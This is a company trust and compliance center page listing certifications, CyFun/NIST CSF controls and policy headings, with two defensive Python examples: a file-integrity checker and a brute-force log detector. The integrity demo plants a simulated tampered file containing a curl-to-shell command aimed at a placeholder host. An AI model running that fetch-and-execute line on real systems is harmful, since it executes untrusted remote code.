Trust & Compliance Center
Welcome to the NormNest Trust & Compliance Center. This portal provides transparency into our security, privacy, and compliance practices.
Certifications
Completed Certifications
ISO/IEC 27001:2022
ISO/IEC 27001:2022 is an international standard for information security. It specifies requirements for establishing, implementing, maintaining and continually improving an Information Security Management System (ISMS). Its aim is to help organizations protect their information systematically against risks such as data breaches, cyberattacks or unauthorized access.
The 2022 edition is an updated revision with more emphasis on risk management, leadership and continual improvement, and it aligns better with current threats and technologies.
KMO-Portefeuille (recognized service provider)
The KMO-Portefeuille is a subsidy scheme of the Flemish government that financially supports small and medium-sized enterprises (SMEs) in attending training and obtaining advice. Organizations recognized as a service provider for the KMO-Portefeuille meet specific quality and administrative requirements and may offer services to Flemish businesses through the platform.
This recognition gives customers not only a financial benefit but also confidence in the expertise and reliability of the service provider.
Data Protection Officer
The Data Protection Officer (DPO) certification confirms our in-depth knowledge of the General Data Protection Regulation (GDPR) and our ability to support organizations in upholding privacy and data protection standards. It underlines our expertise in advising on privacy policy, assessing data processing activities, managing data breaches, and acting as a reliable point of contact for supervisory authorities.
ISO/IEC 27001 Lead Auditor
Holding the ISO/IEC 27001 Lead Auditor certificate confirms our thorough knowledge of information security standards and our ability to perform formal audits of an Information Security Management System (ISMS). The certification reflects our expertise in assessing risks, compliance, and the effectiveness of security controls within organizations. It allows us to support both internal evaluations and preparation for external certification, across the many sectors where information security is critical.
NIS 2 Directive: Senior Lead Implementor
The NIS 2 Directive: Senior Lead Implementor certificate confirms our in-depth knowledge of the requirements and responsibilities arising from the NIS2 Directive, which targets the security of network and information systems in essential and important entities. It attests to our expertise in establishing, implementing and optimizing controls for cybersecurity, risk management, governance and incident response, and it enables us to guide organizations in meeting their NIS2 obligations and building a resilient, compliant digital infrastructure.
Compliance
GDPR
The GDPR (General Data Protection Regulation) is European legislation governing the privacy and protection of the personal data of individuals in the EU. It has applied since May 2018 and obliges organizations to handle personal data with care, to be transparent about how it is used, and to take appropriate security measures. The GDPR gives individuals more control over their data and imposes strict obligations on companies, with high fines for non-compliance.
ISO/IEC 27001
International standard for information security. Demonstrates that your organization manages its risks and protects its data adequately.
NIS2 (EU)
European directive imposing stricter cybersecurity requirements, in particular on essential and important sectors. Relevant to many companies from 2024 onward.
Cyber Fundamentals (CyFun)
Belgian national framework, published by the Centre for Cybersecurity Belgium, that helps organizations bring their cyber resilience to a baseline level. It is organized around the functions identify, protect, detect, respond and recover.
Cybersecurity Framework
Our cybersecurity approach is based on the NIST Cybersecurity Framework, which organizes cybersecurity activities into five core functions: Identify, Protect, Detect, Respond, and Recover. The requirements listed below are the Cyber Fundamentals (CyFun) controls, which reuse the NIST CSF category identifiers; the BASIC_ and IMPORTANT_ prefixes indicate the CyFun assurance level at which each requirement applies.
IDENTIFY
BASIC_ID.AM-1.1: An inventory of assets associated with information and information processing facilities within the organization shall be documented, reviewed, and updated when changes occur.
IMPORTANT_ID.AM-1.2: The inventory of assets associated with information and information processing facilities shall reflect changes in the organization’s context and include all information necessary for effective accountability.
BASIC_ID.AM-2.1: An inventory that reflects what software platforms and applications are being used in the organization shall be documented, reviewed, and updated when changes occur.
IMPORTANT_ID.AM-2.3: Individuals who are responsible and who are accountable for administering software platforms and applications within the organization shall be identified.
IMPORTANT_ID.AM-2.4: When unauthorized software is detected, it shall be quarantined for possible exception handling, removed, or replaced, and the inventory shall be updated accordingly.
BASIC_ID.AM-3.1: Information that the organization stores and uses shall be identified.
IMPORTANT_ID.AM-3.2: All connections within the organization's ICT/OT environment, and to other organization-internal platforms shall be mapped, documented, approved, and updated as appropriate.
IMPORTANT_ID.AM-4.1: The organization shall map, document, authorize and when changes occur, update, all external services and the connections made with them.
BASIC_ID.AM-5.1: The organization’s resources (hardware, devices, data, time, personnel, information, and software) shall be prioritized based on their classification, criticality, and business value.
IMPORTANT_ID.AM-6.1: Information security and cybersecurity roles, responsibilities and authorities within the organization shall be documented, reviewed, authorized, updated, and kept aligned with organization-internal roles and external partners.
IMPORTANT_ID.BE-1.1: The organization’s role in the supply chain shall be identified, documented, and communicated.
IMPORTANT_ID.BE-5.1: To support cyber resilience and secure the delivery of critical services, the necessary requirements shall be identified and documented, and their implementation tested and approved.
BASIC_ID.GV-1.1: Policies and procedures for information security and cyber security shall be created, documented, reviewed, approved, and updated when changes occur.
IMPORTANT_ID.GV-1.2: An organization-wide information security and cybersecurity policy shall be established, documented, updated when changes occur, disseminated, and approved by senior management.
BASIC_ID.GV-3.1: Legal and regulatory requirements regarding information/cybersecurity, including privacy obligations, shall be understood and implemented.
IMPORTANT_ID.GV-3.2: Legal and regulatory requirements regarding information/cybersecurity, including privacy obligations, shall be managed.
BASIC_ID.GV-4.1: As part of the company's overall risk management, a comprehensive strategy to manage information security and cybersecurity risks shall be developed and updated when changes occur.
IMPORTANT_ID.GV-4.2: Information security and cybersecurity risks shall be documented, formally approved, and updated when changes occur.
BASIC_ID.RA-1.1: Threats and vulnerabilities shall be identified.
IMPORTANT_ID.RA-1.2: A process shall be established to monitor, identify, and document vulnerabilities of the organisation's business critical systems in a continuous manner.
IMPORTANT_ID.RA-2.1: A threat and vulnerability awareness program that includes a cross-organization information-sharing capability shall be implemented.
BASIC_ID.RA-5.1: The organization shall conduct risk assessments in which risk is determined by threats, vulnerabilities and impact on business processes and assets.
IMPORTANT_ID.RA-5.2: The organization shall conduct and document risk assessments in which risk is determined by threats, vulnerabilities, impact on business processes and assets, and the likelihood of their occurrence.
IMPORTANT_ID.RA-6.1: A comprehensive strategy shall be developed and implemented to manage risks to the organization’s critical systems, that includes the identification and prioritization of risk responses.
IMPORTANT_ID.RM-2.1: The organization shall clearly determine its risk appetite.
IMPORTANT_ID.RM-3.1: The organization’s role in critical infrastructure and its sector shall determine the organization’s risk appetite.
IMPORTANT_ID.SC-2.1: The organization shall conduct cyber supply chain risk assessments at least annually or when a change to the organization’s critical systems, operational environment, or supply chain occurs. These assessments shall be documented, and the results disseminated to relevant stakeholders, including those responsible for ICT/OT systems.
IMPORTANT_ID.SC-3.1: Based on the results of the cyber supply chain risk assessment, a contractual framework for suppliers and external partners shall be established to address sharing of sensitive information and distributed and interconnected ICT/OT products and services.
IMPORTANT_ID.SC-4.1: The organization shall review assessments of suppliers’ and third-party partners’ compliance with contractual obligations by routinely reviewing audits, test results, and other evaluations.
IMPORTANT_ID.SC-5.1: The organization shall identify and document key personnel from suppliers and third-party partners to include them as stakeholders in response and recovery planning activities.
Develop an organizational understanding to manage cybersecurity risk to systems, people, assets, data, and capabilities.
PROTECT
BASIC_PR.AC-1.1: Identities and credentials for authorized devices and users shall be managed.
IMPORTANT_PR.AC-1.2: Identities and credentials for authorized devices and users shall be managed, where feasible through automated mechanisms.
BASIC_PR.AC-2.1: Physical access to the facility, servers and network components shall be managed.
IMPORTANT_PR.AC-2.2: The management of physical access shall include measures related to access in emergency situations.
BASIC_PR.AC-3.1: The organisation's wireless access points shall be secured.
BASIC_PR.AC-3.2: The organization's networks when accessed remotely shall be secured, including through multi-factor authentication (MFA).
IMPORTANT_PR.AC-3.3: Usage restrictions, connection requirements, implementation guidance, and authorizations for remote access to the organization’s critical systems environment shall be identified, documented and implemented.
BASIC_PR.AC-4.1: Access permissions for users to the organization’s systems shall be defined and managed.
BASIC_PR.AC-4.2: It shall be identified who should have access to the organization's business-critical information and technology, and the means to get access.
BASIC_PR.AC-4.3: Employee access to data and information shall be limited to the systems and specific information they need to do their jobs (the principle of Least Privilege).
BASIC_PR.AC-4.4: Nobody shall have administrator privileges for daily tasks.
IMPORTANT_PR.AC-4.5: Where feasible, automated mechanisms shall be implemented to support the management of user accounts on the organisation's critical systems, including disabling, monitoring, reporting and deleting user accounts.
IMPORTANT_PR.AC-4.6: Separation of duties (SoD) shall be ensured in the management of access rights.
IMPORTANT_PR.AC-4.7: Privileged users shall be managed and monitored.
BASIC_PR.AC-5.1: Firewalls shall be installed and activated on all the organization's networks.
BASIC_PR.AC-5.2: Where appropriate, network integrity of the organization's critical systems shall be protected by incorporating network segmentation and segregation.
IMPORTANT_PR.AC-5.3: Where appropriate, network integrity of the organization's critical systems shall be protected by (1) Identifying, documenting, and controlling connections between system components. (2) Limiting external connections to the organization's critical systems.
IMPORTANT_PR.AC-5.4: The organization shall monitor and control connections and communications at the external boundary and at key internal boundaries within the organization's critical systems by implementing boundary protection devices where appropriate.
IMPORTANT_PR.AC-6.1: The organization shall implement documented procedures for verifying the identity of individuals before issuing credentials that provide access to organization's systems.
IMPORTANT_PR.AC-7.1: The organization shall perform a documented risk assessment on organization's critical system transactions and authenticate users, devices, and other assets (e.g., single-factor, multi-factor) commensurate with the risk of the transaction (e.g., individuals’ security and privacy risks and other organizational risks).
BASIC_PR.AT-1.1: Employees shall be trained as appropriate.
IMPORTANT_PR.AT-1.2: The organization shall incorporate insider threat recognition and reporting into security awareness training.
IMPORTANT_PR.AT-2.1: Privileged users shall be qualified before privileges are granted, and these users shall be able to demonstrate the understanding of their roles, responsibilities, and authorities.
IMPORTANT_PR.AT-3.1: The organization shall establish and enforce security requirements for business-critical third-party providers and users.
IMPORTANT_PR.AT-3.2: Third-party providers shall be required to notify any personnel transfers, termination, or transition involving personnel with physical or logical access to organization's business critical system's components.
IMPORTANT_PR.AT-3.3: The organization shall monitor business critical service providers and users for security compliance.
IMPORTANT_PR.AT-4.1: Senior executives shall demonstrate the understanding of their roles, responsibilities, and authorities.
IMPORTANT_PR.AT-5.1: The organization shall ensure that personnel responsible for the physical protection and security of the organization's critical systems and facilities are qualified through training before privileges are granted, and that they understand their responsibilities.
BASIC_PR.DS-3.1: Assets and media shall be disposed of safely.
IMPORTANT_PR.DS-3.2: The organization shall enforce accountability for all its business-critical assets throughout the system lifecycle, including removal, transfers, and disposition.
IMPORTANT_PR.DS-4.1: Capacity planning shall ensure adequate resources for organization's critical system information processing, networking, telecommunications, and data storage.
IMPORTANT_PR.DS-5.1: The organization shall take appropriate actions resulting in the monitoring of its critical systems at external borders and critical internal points when unauthorized access and activities, including data leakage, is detected.
IMPORTANT_PR.DS-6.1: The organization shall implement software, firmware, and information integrity checks to detect unauthorized changes to its critical system components during storage, transport, start-up and when determined necessary.
IMPORTANT_PR.IP-2.1: The system and application development life cycle shall include security considerations.
IMPORTANT_PR.IP-3.1: Changes shall be tested and validated before being implemented into operational systems.
BASIC_PR.IP-4.1: Backups of the organization's business-critical data shall be conducted and stored on a system different from the device on which the original data resides.
IMPORTANT_PR.IP-4.2: The reliability and integrity of backups shall be verified and tested on a regular basis.
IMPORTANT_PR.IP-4.3: A separate alternate storage site for system backups shall be operated and the same security safeguards as the primary storage location shall be employed.
IMPORTANT_PR.IP-5.1: The organization shall define, implement, and enforce policy and procedures regarding emergency and safety systems, fire protection systems, and environment controls for its critical systems.
IMPORTANT_PR.IP-6.1: The organization shall ensure that its critical system's data is destroyed according to policy.
IMPORTANT_PR.IP-7.1: The organization shall incorporate improvements derived from the monitoring, measurements, assessments, and lessons learned into protection process updates (continuous improvement).
IMPORTANT_PR.IP-8.1: The organization shall collaborate and share information about its critical system's related security incidents and mitigation measures with designated partners.
IMPORTANT_PR.IP-8.2: Communication of effectiveness of protection technologies shall be shared with appropriate parties.
IMPORTANT_PR.IP-9.1: Incident response plans (Incident Response and Business Continuity) and recovery plans (Incident Recovery and Disaster Recovery) shall be established, maintained, approved, and tested to determine the effectiveness of the plans, and the readiness to execute the plans.
BASIC_PR.IP-11.1: Personnel having access to the organization’s most critical information or technology shall be verified.
IMPORTANT_PR.IP-11.2: The organization shall develop and maintain a human resources information/cybersecurity process that applies when recruiting, during employment and at termination of employment.
IMPORTANT_PR.IP-12.1: The organization shall establish and maintain a documented process that allows continuous review of vulnerabilities and strategies to mitigate them.
BASIC_PR.MA-1.1: Patches and security updates for Operating Systems and critical system components shall be installed.
IMPORTANT_PR.MA-1.2: The organization shall plan, perform and document preventive maintenance and repairs on its critical system components according to approved processes and tools.
IMPORTANT_PR.MA-1.3: The organization shall enforce approval requirements, control, and monitoring of maintenance tools for use on its critical systems.
IMPORTANT_PR.MA-1.4: The organization shall verify security controls following hardware maintenance or repairs, and take action as appropriate.
BASIC_PR.PT-1.1: Logs shall be maintained, documented, and reviewed.
IMPORTANT_PR.PT-1.2: The organization shall ensure that the log records include an authoritative time source or internal clock time stamp that are compared and synchronized to an authoritative time source.
IMPORTANT_PR.PT-2.1: The usage restriction of portable storage devices shall be ensured through an appropriate documented policy and supporting safeguards.
IMPORTANT_PR.PT-2.2: The organisation should technically prohibit the connection of removable media unless strictly necessary; in other instances, the execution of autoruns from such media should be disabled.
IMPORTANT_PR.PT-3.1: The organization shall configure the business critical systems to provide only essential capabilities.
BASIC_PR.PT-4.1: Web and e-mail filters shall be installed and used.
Develop and implement appropriate safeguards to ensure delivery of critical infrastructure services.
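The integrity-check requirement in PR.DS-6.1 and the backup-verification requirement in PR.IP-4.2 are met in practice the same way: record a cryptographic hash of every file at a known-good point, keep that manifest somewhere the monitored system cannot rewrite, and compare against it later. The Python script below is an added illustration of that technique written for this page; it is not NormNest's code, and the directory layout, file contents and tampering steps inside `demo()` are constructed for the example.

```python
from __future__ import annotations

import hashlib
import tempfile
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 65536) -> str:
    """Stream-hash a file so large binaries never have to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path) -> dict[str, str]:
    """Map every regular file under root (as a relative POSIX path) to its SHA-256."""
    baseline: dict[str, str] = {}
    for path in sorted(root.rglob("*")):
        # Symlinks are skipped: hashing their target would let an attacker
        # point a link at a file that still matches the manifest.
        if path.is_file() and not path.is_symlink():
            baseline[path.relative_to(root).as_posix()] = sha256_file(path)
    return baseline


def compare_baselines(expected: dict[str, str], observed: dict[str, str]) -> dict[str, list[str]]:
    """Report files that were added, removed or modified relative to the trusted manifest."""
    common = expected.keys() & observed.keys()
    return {
        "added": sorted(set(observed) - set(expected)),
        "removed": sorted(set(expected) - set(observed)),
        "modified": sorted(p for p in common if expected[p] != observed[p]),
    }


def demo() -> dict[str, list[str]]:
    """Constructed scenario: baseline a directory, tamper with it, re-check."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "service").write_bytes(b"\x7fELF original binary")
        (root / "config.ini").write_text("debug=false\n")
        (root / "README").write_text("release 1.0\n")
        baseline = build_baseline(root)  # in production: store off-host or signed

        # Simulated unauthorized changes made after the baseline was taken.
        (root / "bin" / "service").write_bytes(b"\x7fELF backdoored binary")     # modified
        (root / "bin" / "cron.sh").write_text("curl http://example.invalid | sh\n")  # added
        (root / "README").unlink()                                                 # removed

        return compare_baselines(baseline, build_baseline(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

The detection only holds if the baseline itself is trustworthy: keep the manifest on a separate system or sign it, because an attacker who can overwrite `bin/service` on the host can usually also rewrite a manifest stored next to it. The same routine run against a backup set and its copy at the alternate storage site (PR.IP-4.3) gives the regular integrity verification PR.IP-4.2 asks for.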
DETECT
IMPORTANT_DE.AE-2.1: The organization shall review and analyze detected events to understand attack targets and methods.
BASIC_DE.AE-3.1: The activity logging functionality of protection / detection hardware or software (e.g. firewalls, anti-virus) shall be enabled, backed-up and reviewed.
IMPORTANT_DE.AE-5.1: The organization shall implement automated mechanisms and system generated alerts to support event detection and to assist in the identification of security alert thresholds.
BASIC_DE.CM-1.1: Firewalls shall be installed and operated on the network boundaries and complemented with firewall protection on the endpoints.
IMPORTANT_DE.CM-1.2: The organization shall monitor and identify unauthorized use of its business critical systems through the detection of unauthorized local connections, network connections and remote connections.
IMPORTANT_DE.CM-2.1: The physical environment of the facility shall be monitored for potential information/cybersecurity events.
BASIC_DE.CM-3.1: Endpoint and network protection tools to monitor end-user behavior for dangerous activity shall be implemented.
IMPORTANT_DE.CM-3.2: Endpoint and network protection tools that monitor end-user behavior for dangerous activity shall be managed.
BASIC_DE.CM-4.1: Anti-virus, -spyware, and other -malware programs shall be installed and updated.
IMPORTANT_DE.CM-5.1: The organization shall define acceptable and unacceptable mobile code and mobile code technologies; and authorize, monitor, and control the use of mobile code within the system.
IMPORTANT_DE.CM-6.1: All external connections by vendors supporting IT/OT applications or infrastructure shall be secured and actively monitored to ensure that only permissible actions occur during the connection.
IMPORTANT_DE.CM-6.2: External service providers' conformance with personnel security policies and procedures and contract security requirements shall be monitored relative to their cybersecurity risks.
IMPORTANT_DE.CM-7.1: The organization's business critical systems shall be monitored for unauthorized personnel access, connections, devices, access points, and software.
IMPORTANT_DE.CM-8.1: The organization shall monitor and scan for vulnerabilities in its critical systems and hosted applications ensuring that system functions are not adversely impacted by the scanning process.
IMPORTANT_DE.CM-8.2: The vulnerability scanning process shall include analysis, remediation, and information sharing.
IMPORTANT_DE.DP-2.1: The organization shall conduct detection activities in accordance with applicable federal and regional laws, industry regulations and standards, policies, and other applicable requirements.
IMPORTANT_DE.DP-4.1: The organization shall communicate event detection information to predefined parties.
IMPORTANT_DE.DP-5.1: Improvements derived from the monitoring, measurement, assessment, testing, review, and lessons learned, shall be incorporated into detection process revisions.
Develop and implement appropriate activities to identify the occurrence of a cybersecurity event.
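DE.AE-5.1 asks for system-generated alerts with defined alert thresholds, and PR.PT-1.2 for log records that carry time stamps synchronized to an authoritative source. The script below, an added example written for this page rather than NormNest's own tooling, shows the two together: it parses constructed sshd-style log lines (the line format and the RFC 5737 documentation addresses are assumed for the example) and raises one alert per source address once failed logins reach a threshold inside a sliding time window.

```python
from __future__ import annotations

import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log lines for this example (not from a real system).
# Assumed format: "<ISO-8601 UTC timestamp> <host> sshd: <message>".
SAMPLE_LOG = """\
2024-05-01T10:00:01Z gw1 sshd: Failed password for root from 203.0.113.7
2024-05-01T10:00:02Z gw1 sshd: Failed password for admin from 203.0.113.7
2024-05-01T10:00:03Z gw1 sshd: Accepted publickey for alice from 198.51.100.4
2024-05-01T10:00:04Z gw1 sshd: Failed password for root from 203.0.113.7
2024-05-01T10:00:05Z gw1 sshd: Failed password for oracle from 203.0.113.7
2024-05-01T10:00:06Z gw1 sshd: Failed password for root from 203.0.113.7
2024-05-01T10:00:50Z gw1 sshd: Failed password for bob from 198.51.100.4
2024-05-01T10:09:00Z gw1 sshd: Failed password for bob from 198.51.100.4
2024-05-01T10:20:00Z gw1 sshd: Failed password for root from 203.0.113.7
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd: Failed password for (?P<user>\S+) from (?P<ip>\S+)$"
)


def parse_failed_logins(text: str) -> list[tuple[datetime, str, str]]:
    """Extract (timestamp, source ip, user) from failed-login lines; other lines are ignored."""
    events = []
    for line in text.splitlines():
        m = FAILED_RE.match(line)
        if m is None:
            continue
        # datetime.fromisoformat() only accepts a trailing "Z" from Python 3.11; normalize it.
        ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
        events.append((ts, m["ip"], m["user"]))
    return events


def detect_bruteforce(
    events: list[tuple[datetime, str, str]],
    threshold: int = 5,
    window: timedelta = timedelta(minutes=1),
) -> list[dict]:
    """Sliding-window count of failures per source; one alert per source once the threshold is hit."""
    recent: dict[str, deque[datetime]] = defaultdict(deque)
    alerted: set[str] = set()
    alerts: list[dict] = []
    for ts, ip, user in sorted(events):  # lines may arrive out of order; process by time stamp
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:  # forget failures that fell out of the window
            q.popleft()
        if len(q) >= threshold and ip not in alerted:
            alerted.add(ip)
            alerts.append({
                "source": ip,
                "failures": len(q),
                "first_seen": q[0].isoformat(),
                "last_seen": ts.isoformat(),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_failed_logins(SAMPLE_LOG)):
        print(alert)
```

Tune `threshold` and `window` to the environment's normal rate of legitimate failures. The window arithmetic is only meaningful when every log source shares an authoritative time source, which is exactly what PR.PT-1.2 requires: a host whose clock drifts by minutes will either hide a real burst or stitch unrelated failures into a false one.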
RESPOND
BASIC_RS.RP-1.1: An incident response process, including roles, responsibilities, and authorities, shall be executed during or after an information/cybersecurity event on the organization's critical systems.
IMPORTANT_RS.CO-1.1: The organization shall ensure that personnel understand their roles, objectives, restoration priorities, task sequences (order of operations) and assignment responsibilities for event response.
IMPORTANT_RS.CO-2.1: The organization shall implement reporting on information/cybersecurity incidents on its critical systems in an organization-defined time frame to organization-defined personnel or roles.
IMPORTANT_RS.CO-3.2: The organization shall share information/cybersecurity incident information with relevant stakeholders as foreseen in the incident response plan.
IMPORTANT_RS.CO-5.1: The organization shall share information/cybersecurity event information voluntarily, as appropriate, with external stakeholders, industry security groups and similar parties to achieve broader information/cybersecurity situational awareness.
IMPORTANT_RS.AN-1.1: The organization shall investigate information/cybersecurity-related notifications generated from detection systems.
IMPORTANT_RS.AN-2.1: Thorough investigation and result analysis shall be the base for understanding the full implication of the information/cybersecurity incident.
IMPORTANT_RS.AN-4.1: Information/cybersecurity incidents shall be categorized according to the level of severity and impact, consistent with the evaluation criteria included in the incident response plan.
IMPORTANT_RS.AN-5.1: The organization shall implement vulnerability management processes and procedures that include processing, analyzing and remedying vulnerabilities from internal and external sources.
BASIC_RS.IM-1.1: The organization shall conduct post-incident evaluations to analyse lessons learned from incident response and recovery, and consequently improve processes / procedures / technologies to enhance its cyber resilience.
IMPORTANT_RS.IM-1.2: Lessons learned from incident handling shall be translated into updated or new incident handling procedures that shall be tested, approved and trained.
IMPORTANT_RS.IM-2.1: The organization shall update the response and recovery plans to address changes in its context.
Develop and implement appropriate activities to take action regarding a detected cybersecurity incident.
RECOVER
BASIC_RC.RP-1.1: A recovery process for disasters and information/cybersecurity incidents shall be developed and executed as appropriate.
IMPORTANT_RC.IM-1.1: The organization shall incorporate lessons learned from incident recovery activities into updated or new system recovery procedures and, after testing, frame this with appropriate training.
Develop and implement appropriate activities to maintain plans for resilience and to restore capabilities impaired by cybersecurity incidents.
Trust Policies
Risk Profile
Recovery Time Objective
Third-Party Dependence
Hosting
Determines the resilience of your system and the importance of your service to customers. Includes recovery objectives, data sensitivity and dependence on third parties.
Product Security
Audit Logging
Data Beveiliging
Integraties
Multi-Factor Authenticatie
Passkey Ondersteuning
Role-Based Access Control
Service-Level Agreement
SSO
Team Management
Contains the technical and organizational measures used to secure your product, control access and manage user roles.
Reports
Vulnerability Assessment Report
Refers to the technical and compliance documentation you can provide to demonstrate your security posture and infrastructure.
Data Security
Access Monitoring
Data Backups
Data Erasure
Encryption-at-rest
Encryption-in-transit
Media Protection
Physical Media Disposal
Physical Security
This section describes how your organization protects data throughout its entire lifecycle. These measures demonstrate your commitment to protecting customer information through technical controls, policies and data-handling procedures.
Application Security
Responsible Disclosure
Application Penetration Testing
This category details how security is integrated into your application development and maintenance processes. These practices show how you prevent, identify and address security vulnerabilities in your software development lifecycle.
Legal
Cyber Insurance
Data Processing Agreement
Data Subject Requests
Master Services Agreement
Privacy Policy
Service-Level Agreement
Terms of Service
This section provides access to the contractual agreements and legal documentation that define your relationship with customers. These documents formalize security commitments, data processing practices and compliance obligations.
Data Privacy
Cookies
Data Breach Notifications
This category outlines how your organization manages personal data and respects privacy rights. These practices show your commitment to data privacy compliance and ethical data processing.
Access Control
Access Log Management
Automated Account Management
Bring Your Own Device (BYOD)
Data Access
Internal Single-Sign-On (SSO)
Least Privilege
Logging
Mobile Device Access
Password Manager
Password Security
Remote Access
Separation of Duties
System Use Notification
User Access Review
Virtual Private Network (VPN)
Wireless Access
This section details how your organization manages and restricts access to systems and data. These controls prevent unauthorized access while ensuring that legitimate users can perform their required functions efficiently.
Infrastructure
Status Monitoring
Network Time Protocol
Time Synchronization
This category covers all components of your technical infrastructure, including cloud services, data centers and network configurations. These elements form the technical foundation on which your SaaS solution runs and show how you ensure reliability, scalability and security at the infrastructure level.
Endpoint Security
Anti-Malware
Disk Encryption
DNS Filtering
Endpoint Detection & Response
Host Intrusion Prevention System (HIPS)
Portable Storage Management
This category covers how you secure end-user devices such as computers, laptops and mobile devices that access your systems. These measures show how you prevent and detect threats at the level of individual devices, providing a crucial line of defense against attackers.
Network Security
Data Loss Prevention
Firewall
Network Penetration Testing
Traffic Filtering
Web Application Firewall
Wireless Security
This section describes how your organization secures communication within and to your networks. These measures demonstrate your approach to monitoring and filtering network traffic and protecting it against intrusion and data exfiltration.
Corporate Security
Email Protection
Employee Handbook
Employee Training
Incident Response
Internal Assessments
Penetration Testing
Employee Termination/Transfer
Security Operations Center
External Personnel Program
This category covers organization-level security practices, including personnel policy, training and incident response. These measures show how the human and organizational aspects of security are managed to create an overall security culture.
Policies
Acceptable Use Policy
Access Control Policy
Anti-Malware Policy
Asset Management Policy
Awareness and Training Policy
Backup Policy
Bring Your Own Device (BYOD) Policy
Business Continuity/Disaster Recovery Policy
Configuration Management Policy
This section contains the formal policies that direct and govern your security practices. These documents demonstrate your systematic approach to security management and form the foundation for consistent and effective security measures within your organization.
Incident Response
Incident Reporting Process
This category describes how your organization prepares for, responds to and recovers from security incidents. These processes demonstrate your ability to handle security events effectively and to minimize their impact on customers and business operations.
Risk Management
Risk Assessments
Supply Chain Risk Management
Third-Party Dependence
This section outlines how your organization identifies, assesses and manages security risks. These practices demonstrate your systematic approach to understanding risks and implementing appropriate security measures based on the threat landscape.
Asset Management
Asset Classification
Asset Inventories (Hardware/Software)
Asset Tracking
IT Asset Management (ITAM) Program
Secure Asset Disposal
This category details how your organization tracks, classifies and manages hardware and software assets. These processes show how you oversee the full lifecycle of assets to control security risks and ensure compliance.
Business Continuity/Disaster Recovery (BC/DR)
Alternate Processing/Storage Site
Business Continuity Management System (BCMS)
Business Continuity Plan (BCP)
Contingency Plan Testing/Lessons Learned
Contingency Training/Simulations
Continuity/Contingency of Operations Plan
Data Backup/Backup Protection
Disaster Recovery Plan (DRP)
Tabletop Exercises
This section describes how your organization prepares for and recovers from serious disruptions. These plans and procedures demonstrate your ability to maintain or quickly restore critical business functions during emergencies, minimizing the impact on customers.
Training
Phishing Training
Role-Based Training
Security Awareness Training
Training Program
This category describes the security training and awareness programs for your employees. These initiatives show how you build a strong security culture and ensure that staff have the knowledge to act securely and recognize security risks.
Change Management
Configuration Management Program
Impact Analysis
This section describes how your organization manages changes to IT systems and processes. These procedures demonstrate your controlled approach to implementing changes, reducing the risk of security problems caused by change.
Physical & Environmental Security
Access Monitoring
Alarms & Surveillance
Alternate Work Sites
Emergency Power & Lighting
Fire Protection
Physical Access Security
Power Equipment & Cabling
Remote Telework
Visitor Control
This category covers measures for securing the physical facilities and environments where your systems are located. These controls show how you prevent unauthorized physical access and protect against environmental risks such as fire or power failure.
Continuous Monitoring
Data Loss Prevention (DLP) System
Event & Audit Log Management
Reviews & Updates
This section describes how your organization continuously monitors systems and networks for security events. These processes demonstrate your ability to detect and respond to threats and vulnerabilities in a timely manner through constant vigilance.